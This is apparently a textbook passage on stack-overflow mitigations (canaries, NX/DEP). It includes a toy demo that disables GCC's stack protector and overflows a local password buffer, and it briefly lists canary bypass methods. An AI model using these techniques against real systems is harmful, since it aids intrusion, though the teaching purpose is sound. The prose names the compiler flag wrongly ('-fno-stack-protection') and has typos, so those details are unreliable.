First and foremost, the best defense against stack-based overflow attacks is the use of secure
coding practices—mostly through stopping the use of functions that allow for unbounded
memory access and carefully calculating memory access to prevent attackers from
modifying adjacent values in memory. Quite simply, if attackers can only access the
memory of the variable they intend to change, they cannot affect code execution beyond the
expectations of the developer and architect.

Unfortunately, there are thousands of programs that implemented the unsafe, unbounded
functions to access memory, and recoding all of them to meet secure coding practices is
simply not feasible. For those legacy programs, operating system manufacturers
implemented several mitigations to prevent poor coding practices that result in arbitrary
code execution. We can see this in action somewhat in our example by toggling the
protections and pushing further in our overflow.

One quick change that compilers made in the immediate aftermath of the stack-based attacks
was starting to include protections on important pieces of data, such as return addresses.
Since most stack overflow attacks involved overflowing one data location and writing to
another, the compiler placed a sacrificial known value between buffers and important data,
then the program would check to see whether the sacrificial value had been changed before
using the important data. If that value had been changed, it was likely that the important
data was also altered, so execution would stop immediately. Since a change in these
sacrificial values could be determined before malicious code execution would start, the
values are known as “canaries.” If the canary was disturbed, exception code was executed
and the program terminated.

Now, stack canaries, by themselves, aren’t bulletproof, since there are a few ways to bypass
them. One method is by finding the canary value through an unbounded read of memory or
guessing. In some cases, canary values are static and predictable. Once attackers know the
canary value, they can replace it in the overwrite. For this reason, canaries often contain
characters that are difficult to send, such as “enter” (\x0a) or “vertical tab” (\x0b).“enter”
While a challenge for the attacker, this reduces the entropy of the canary value and makes
them easier to find in memory.

To bypass the canary stack protections using the GNU Compiler Collection (GCC), upi must
specific that you want the protections turned off, with the flag ‘‘-fno-stack-protection.’

To demonstrate, let’s compile the program without protections and pass it a large buffer. In
this case, I am using a small inline perl script to generate a series of 90 instances of ‘a’ and
pass that into the program example.elf:

msfuser@ubuntu:~$ gcc -o example.elf -fno-stack-protector overwrite.c

.
msfuser@ubuntu:~$ perl -e 'print "a"x90' | ./example.elf

SUCCESS!

givenPassword:

aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa

aaaaaaa

realPassword: aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa

Segmentation fault (core dumped)

This resulted in a program crash, which is expected when memory structures are corrupted
with bad data. This is likely the result of overwriting the return value, and then the
processor crashing when trying to access the new memory. If we’d overwritten the location
with somewhere that the CPU could access, it would have been happy to do so.

Now let’s redo the experiment, but without disabling the gcc stack protections:

msfuser@ubuntu:~$ gcc -o example.elf overwrite.c


overwrite.c: In function ‘main’:

msfuser@ubuntu:~$ perl -e 'print "a"x90' | ./example.elf

FAILURE!

givenPassword:

aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa

aaaaaaa

realPassword: ddddddddddddddd
*** stack smashing detected ***: ./example.elf terminated

Aborted (core dumped)

msfuser@ubuntu:~$

Changes to hardware and operating systems took longer, but they did happen. One of the
first mitigations introduced by hardware and operating system vendors was the NX, or no-
execute bit. On Windows, this was known as Data Execution Prevention (DEP). It allowed
operating systems to define certain areas of memory as non-executable, and when flagged as
such, the CPU would simply not execute that memory. In theory, there should never be
executable code on the stack, as it is designed for storing data values only. Based on that
understanding, operating systems classified the stack as non-executable, preventing arbitrary
code from being placed on the stack and executed.

You might also like